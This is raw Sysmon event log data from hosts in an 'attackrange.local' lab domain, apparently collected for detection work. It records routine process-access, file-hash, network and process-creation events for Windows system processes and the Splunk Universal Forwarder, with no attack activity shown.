07:51:26.397{466BC892-02AF-60E8-0C00-00000000CF01}8448956C:\Windows\system32\svchost.exe{466BC892-81EC-60E9-8133-00000000CF01}9348C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x3200C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+78b1|C:\Windows\SYSTEM32\psmserviceexthost.dll+739b|C:\Windows\SYSTEM32\psmserviceexthost.dll+ae34|C:\Windows\SYSTEM32\psmserviceexthost.dll+7bae|C:\Windows\SYSTEM32\psmserviceexthost.dll+12141|C:\Windows\SYSTEM32\psmserviceexthost.dll+170e8|C:\Windows\SYSTEM32\resourcepolicyserver.dll+12326|C:\Windows\SYSTEM32\resourcepolicyserver.dll+bac5|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001048240Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:51:26.397{466BC892-32D3-60E8-770B-00000000CF01}63567856C:\Windows\Explorer.EXE{466BC892-81EC-60E9-8133-00000000CF01}9348C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\SYSTEM32\twinapi.appcore.dll+1ea06|C:\Windows\SYSTEM32\twinapi.appcore.dll+1e3d1|C:\Windows\SYSTEM32\twinapi.appcore.dll+1dbcc|C:\Windows\SYSTEM32\twinapi.appcore.dll+1d777|C:\Windows\System32\TwinUI.dll+109146|C:\Windows\System32\TwinUI.dll+82a97|C:\Windows\System32\TwinUI.dll+beade|C:\Windows\System32\TwinUI.dll+beaa9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 
10341000x80000000000000001048239Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:51:26.397{466BC892-32D3-60E8-770B-00000000CF01}63567856C:\Windows\Explorer.EXE{466BC892-81EC-60E9-8133-00000000CF01}9348C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\SYSTEM32\twinapi.appcore.dll+1e95e|C:\Windows\SYSTEM32\twinapi.appcore.dll+1e3d1|C:\Windows\SYSTEM32\twinapi.appcore.dll+1dbcc|C:\Windows\SYSTEM32\twinapi.appcore.dll+1d777|C:\Windows\System32\TwinUI.dll+109146|C:\Windows\System32\TwinUI.dll+82a97|C:\Windows\System32\TwinUI.dll+beade|C:\Windows\System32\TwinUI.dll+beaa9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001048238Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:51:26.397{466BC892-02AF-60E8-0C00-00000000CF01}8448956C:\Windows\system32\svchost.exe{466BC892-81EC-60E9-8133-00000000CF01}9348C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x3200C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+78b1|C:\Windows\SYSTEM32\psmserviceexthost.dll+739b|C:\Windows\SYSTEM32\psmserviceexthost.dll+ae34|C:\Windows\SYSTEM32\psmserviceexthost.dll+7bae|C:\Windows\SYSTEM32\psmserviceexthost.dll+12141|C:\Windows\SYSTEM32\psmserviceexthost.dll+170e8|C:\Windows\SYSTEM32\resourcepolicyserver.dll+12326|C:\Windows\SYSTEM32\resourcepolicyserver.dll+bac5|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntd
ll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 23542300x80000000000000001048237Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:51:26.111{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=779302C0F1108ED18DEBEA01B6664A76,SHA256=AB0E475099CE65E9C55AE06DCAEA90DDE124FD18BCBB12E8E6B2B57D233095EB,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000807417Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:51:25.229{0C1E0330-0512-60E8-CA00-00000000D001}3600C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-623.attackrange.local57253-false10.0.1.12ip-10-0-1-12.eu-central-1.compute.internal8000- 23542300x8000000000000000807416Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:51:26.643{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=8E00B404D86AA56F511649316B9BA5CB,SHA256=55121FFE55147D2FA324C96CE8C9090F571AC113613C68706794EC68815C07EA,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000807415Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:51:26.331{0C1E0330-050B-60E8-A000-00000000D001}35321936C:\Windows\system32\conhost.exe{0C1E0330-F47E-60EB-6F79-00000000D001}1188C:\Program 
Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000807414Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:51:26.331{0C1E0330-048F-60E8-0C00-00000000D001}724636C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000807413Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 
07:51:26.331{0C1E0330-048F-60E8-0C00-00000000D001}724636C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000807412Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:51:26.331{0C1E0330-048F-60E8-0C00-00000000D001}724636C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000807411Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 
07:51:26.331{0C1E0330-048F-60E8-0C00-00000000D001}724636C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000807410Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:51:26.331{0C1E0330-048F-60E8-0C00-00000000D001}724636C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000807409Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 
07:51:26.331{0C1E0330-048F-60E8-0C00-00000000D001}724636C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000807408Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:51:26.331{0C1E0330-048F-60E8-0C00-00000000D001}724636C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000807407Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 
07:51:26.331{0C1E0330-048F-60E8-0C00-00000000D001}724636C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000807406Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:51:26.331{0C1E0330-048F-60E8-0C00-00000000D001}724636C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000807405Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:51:26.331{0C1E0330-048F-60E8-0500-00000000D001}412428C:\Windows\system32\csrss.exe{0C1E0330-F47E-60EB-6F79-00000000D001}1188C:\Program 
Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x8000000000000000807404Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:51:26.331{0C1E0330-050B-60E8-9B00-00000000D001}10203368C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{0C1E0330-F47E-60EB-6F79-00000000D001}1188C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x8000000000000000807403Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:51:26.316{0C1E0330-F47E-60EB-6F79-00000000D001}1188C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe10.0.10011.16384SplunkMonNoHandle Control ProgramWindows (R) Win 7 DDK driverWindows (R) Win 7 DDK providerSplunkMonNoHandle.exe"C:\Program 
Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{0C1E0330-048F-60E8-E703-000000000000}0x3e70SystemMD5=BF28C74E12839E40CD89696C7CB01573,SHA256=6187325F302F232DE582FE28E0E0D2B292AB8122C3356C9CE295A482D7B93EA3,IMPHASH=27776F2813155A6CF34F6A075A0C2EC8{0C1E0330-050B-60E8-9B00-00000000D001}1020C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x8000000000000000807402Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:51:26.268{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=C2BBFB55185AD5A894E0D9EA12E37F6C,SHA256=06F9CC59400E81BD3727031501F96BBBB410415533C8620E034752E4A4906C86,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000807446Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:51:27.878{0C1E0330-F47F-60EB-7179-00000000D001}34163904C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe{0C1E0330-050B-60E8-9B00-00000000D001}1020C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e675|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e1a6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+6b453|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+8e8530|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000807445Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 
07:51:27.706{0C1E0330-050B-60E8-A000-00000000D001}35321936C:\Windows\system32\conhost.exe{0C1E0330-F47F-60EB-7179-00000000D001}3416C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000807444Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:51:27.706{0C1E0330-048F-60E8-0C00-00000000D001}724636C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000807443Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 
07:51:27.706{0C1E0330-048F-60E8-0C00-00000000D001}724636C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000807442Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:51:27.706{0C1E0330-048F-60E8-0C00-00000000D001}724636C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000807441Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 
07:51:27.706{0C1E0330-048F-60E8-0C00-00000000D001}724636C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000807440Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:51:27.706{0C1E0330-048F-60E8-0C00-00000000D001}724636C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 